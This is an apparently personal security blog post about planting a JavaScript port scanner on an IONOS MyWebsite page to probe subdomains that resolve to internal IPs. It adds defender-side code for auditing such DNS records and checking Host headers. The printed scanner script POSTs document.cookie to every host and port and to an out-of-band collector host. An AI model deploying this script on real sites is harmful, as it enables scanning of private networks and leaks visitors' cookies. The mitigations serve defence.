Javascript silliness
Creating a test page:
So, after taking some offensive JavaScript lessons, the bright idea came to mind that I should see what else I could make with it. I'd been playing with some ideas about DNS rebinding and using subdomains that resolve to internal IPs as pivot points to reach private IPs, and I'd found a way to go through all the subdomains one at a time and try to resolve them. So I combined that with other pre-existing knowledge. I have heard many times of people making JavaScript use WebSockets to then scan the network, so I thought, pft, do you even need WebSockets for this?
Well, there are some problems. The first is that, it seems, this method waits for each request to complete before moving along, which will bog down most browsers. I was also going off an extremely large list of subdomains and literally all ports, so the browser tab had to wait on (lots of IPs) times (65550) ports. Terrible design, terrible idea, aaaaaand then came the weird part.
It worked, but it overloaded Chrome until it shut down.
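A defender-side counterpart to the idea above, added here as an example and not part of the original post: the exposure the scan depends on is a public DNS name whose A record points into private address space, and that is something you can audit in your own zones before anyone else does. The code is plain JavaScript with no dependencies; the hostnames and addresses in SAMPLE_RECORDS are constructed, and ipv4ToInt, inCidr, isNonPublicIPv4 and findInternalPointingRecords are names of my own. To run it against real zones, feed findInternalPointingRecords a map built from a DNS export or from Node's dns.promises.resolve4.

```javascript
// Added defender-side example (not the post's code): find public DNS names
// that resolve into private, loopback, link-local or CGNAT address space.

// Ranges that should never appear behind a public hostname, as
// [network, prefixLength] pairs (RFC 1918, loopback, link-local, "this
// network" and RFC 6598 shared address space).
const NON_PUBLIC_V4 = [
  ["10.0.0.0", 8],
  ["172.16.0.0", 12],
  ["192.168.0.0", 16],
  ["127.0.0.0", 8],
  ["169.254.0.0", 16],
  ["0.0.0.0", 8],
  ["100.64.0.0", 10],
];

// Dotted quad -> unsigned 32-bit integer, or null when the text is not an IPv4 address.
function ipv4ToInt(ip) {
  const parts = String(ip).split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p)) return null;
    const v = Number(p);
    if (v > 255) return null;
    n = n * 256 + v;
  }
  return n;
}

// True when ip lies inside network/prefix. Bitwise ops work on int32 in JS,
// so results are forced back to unsigned with >>> 0 before comparing.
function inCidr(ip, network, prefix) {
  const a = ipv4ToInt(ip);
  const b = ipv4ToInt(network);
  if (a === null || b === null) return false;
  const mask = prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
  return ((a & mask) >>> 0) === ((b & mask) >>> 0);
}

function isNonPublicIPv4(ip) {
  return NON_PUBLIC_V4.some(([net, len]) => inCidr(ip, net, len));
}

// records: { hostname: [ipv4, ...] } -> [{ name, ip, range }, ...]
// One finding per (name, address) pair that lands in a non-public range.
function findInternalPointingRecords(records) {
  const findings = [];
  for (const [name, ips] of Object.entries(records)) {
    for (const ip of ips) {
      const hit = NON_PUBLIC_V4.find(([net, len]) => inCidr(ip, net, len));
      if (hit) findings.push({ name, ip, range: `${hit[0]}/${hit[1]}` });
    }
  }
  return findings;
}

// Constructed sample zone data (hypothetical names and addresses, not real records).
const SAMPLE_RECORDS = {
  "www.example.test": ["203.0.113.10"],
  "dev-k8s.example.test": ["10.42.0.15"],
  "grafana.example.test": ["192.168.1.20", "203.0.113.20"],
  "localhost-test.example.test": ["127.0.0.1"],
};

for (const f of findInternalPointingRecords(SAMPLE_RECORDS)) {
  console.log(`${f.name} -> ${f.ip} (in ${f.range})`);
}
```

Every hit is a name an attacker's page can use as a "pivot point" in the sense described above: the browser will happily send a request to it, and the request lands on a host the attacker could not reach directly. The fix is to keep those names out of public DNS (split-horizon DNS or an internal zone), which removes the exposure rather than trying to detect each scan.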
MyWebsite from IONOS
IONOS has a platform called MyWebsite which lets users create a website from templates and features in a really super user-friendly way. In the background this uses WordPress; many multitenant web hosting providers do this and usually have some wrapper around it. In my case, this was unintentionally the biggest hurdle of the whole thing. Because everything is designed for user experience, direct access to the files isn't available. Trying to delete the page so I could continue editing, or retry, failed: the editor loads the page's JS to show the preview whenever you try to edit the page, so it can't be accessed. Trying to create and remove another page, I wasn't able to replay the deletion request to rewrite it.
Here's an example of it running; be sure to filter the connections for the 10.0.0.0/8 IP range.
https://app.any.run/tasks/546fb212-d18e-4eaa-ba1b-da154e86ba1d
I was able to contact their support team and at this time we're waiting to see if they can remove the page for me.
EDIT: After a couple of days they responded saying their devs couldn't find the script causing this and asked for permission to remove it. I reminded them that this is what I had asked for anyway, and also showed them how to curl the page and grep for the base64-encoded script. Maybe later I'll describe why encoding your content like that is plausibly a bad idea, but for now, another 2 days later, it's resolved.
So what was the code?
Alright, so long story short, it was basically something roughly like this:

```javascript
const rebindstart = 1;
const rebindend = 65550;
const listing = [
  // a bunch of subdomains here, think I found it with subfinder
];
let obj; // assigned asynchronously by the first fetch's .then, so it is still
         // undefined when the second fetch reads it in the same iteration

listing.forEach((domain) => {
  // every port from rebindstart to rebindend, for every subdomain
  Array.from({ length: rebindend - rebindstart + 1 }, (_, index) => rebindstart + index).forEach(port => {
    try {
      fetch('https://' + domain + ':' + port, { method: 'POST', mode: 'no-cors', body: document.cookie, }).then(data => { obj = data; });
      fetch('https://(mytesting).oast.site', { method: 'POST', mode: 'no-cors', body: obj, });
      // never awaited, so this 20 ms pause does nothing to pace the loop
      new Promise(r => setTimeout(r, 20));
    } catch (error) {}
  });
});
```

So let's go through this. Start at 1, end at 65550, so we know it's all ports. Then the large listing of subdomains. I then used a forEach over the listing; apparently this isn't the ideal way to do this, and an async for...of loop instead would have worked better. I also considered changing the array to something like:

```javascript
Array.from(["80","8080","443","8443","10000","88","5789"]).forEach(port => {
  // ... the rest of this variant is not on the page
```
The code then does a simple fetch for each port on each subdomain and tries to send document.cookie over to an out-of-band (OAST) site. You can see why this would be problematic for the reputation of companies that publish public subdomains resolving to private IPs: attackers can leverage them to gain access to network resources. This is incredibly common (most cloud providers, most retail businesses, social media sites, etc.), especially with Kubernetes clusters. The whole thing looks something like this:
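As an added example of the mitigation on the receiving side (my code, not the post's and not anything from IONOS): because the scanner uses mode: 'no-cors', CORS does not stop a request from reaching an internal service, but under classic DNS rebinding the browser still sends the attacker-controlled name in the Host header. An internal service that only answers for the names it is actually deployed under can refuse those requests outright. ALLOWED_HOSTS and the requests in SAMPLE_REQUESTS are constructed; parseHostHeader, isAllowedHost and checkRequest are names of my own, and 421 Misdirected Request is the status code I chose for the refusal.

```javascript
// Added defender-side example, not the post's code: validate the HTTP Host
// header against the names an internal service is really deployed under.
// A DNS-rebound request arrives with the attacker's hostname in Host, so the
// service can refuse it without relying on CORS.

// Names and addresses this hypothetical service answers for (constructed).
const ALLOWED_HOSTS = new Set(["grafana.internal.test", "10.42.0.15", "localhost"]);

// Split a Host header into { host, port }; returns null for malformed input.
// Handles "name", "name:port", "[v6addr]" and "[v6addr]:port".
function parseHostHeader(value) {
  if (typeof value !== "string") return null;
  const v = value.trim().toLowerCase();
  let host;
  let portText;
  if (v.startsWith("[")) {
    const end = v.indexOf("]");
    if (end === -1) return null;
    host = v.slice(1, end);
    const rest = v.slice(end + 1);
    if (rest === "") portText = null;
    else if (/^:\d{1,5}$/.test(rest)) portText = rest.slice(1);
    else return null;
  } else {
    const m = /^([a-z0-9.-]+)(?::(\d{1,5}))?$/.exec(v);
    if (!m) return null;
    host = m[1];
    portText = m[2] === undefined ? null : m[2];
  }
  const port = portText === null ? null : Number(portText);
  if (port !== null && (port < 1 || port > 65535)) return null;
  return { host, port };
}

// True when the hostname part of the header is one the service is deployed under.
// The port is deliberately ignored: the allowlist is about names, not listeners.
function isAllowedHost(headerValue, allowed = ALLOWED_HOSTS) {
  const parsed = parseHostHeader(headerValue);
  return parsed !== null && allowed.has(parsed.host);
}

// HTTP status a minimal gatekeeper would answer with: 421 Misdirected Request
// for a missing, malformed or unexpected Host, otherwise 200 and on to the app.
function checkRequest(req, allowed = ALLOWED_HOSTS) {
  return isAllowedHost(req.headers.host, allowed) ? 200 : 421;
}

// Constructed sample requests: legitimate clients and a rebound one.
const SAMPLE_REQUESTS = [
  { headers: { host: "grafana.internal.test" } },        // 200
  { headers: { host: "Grafana.Internal.Test:3000" } },   // 200, matched case-insensitively
  { headers: { host: "dev-k8s.attacker.test:8443" } },   // 421, rebound name
  { headers: { host: "10.42.0.15" } },                   // 200, deployed address
  { headers: { host: "[::1]:3000" } },                   // 421, not in the allowlist
  { headers: {} },                                       // 421, no Host at all
];

for (const r of SAMPLE_REQUESTS) {
  console.log(`${r.headers.host || "(no Host)"} -> ${checkRequest(r)}`);
}
```

Two caveats worth stating. This check stops rebinding from an attacker's own domain; when a company's own public subdomain already points at the internal host, Host looks legitimate, and the real fix is not publishing private addresses in public DNS at all. And the scanner above posts document.cookie from the attacker's page, so cookie hardening on the target does not enter into it; what matters on the target is that an unauthenticated request from a browser on the LAN gets nothing useful back.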
Thanks for reading
If you need any IT or CyberSecurity work remotely or within the DFW area, please contact us over at FeemcoTechnologies.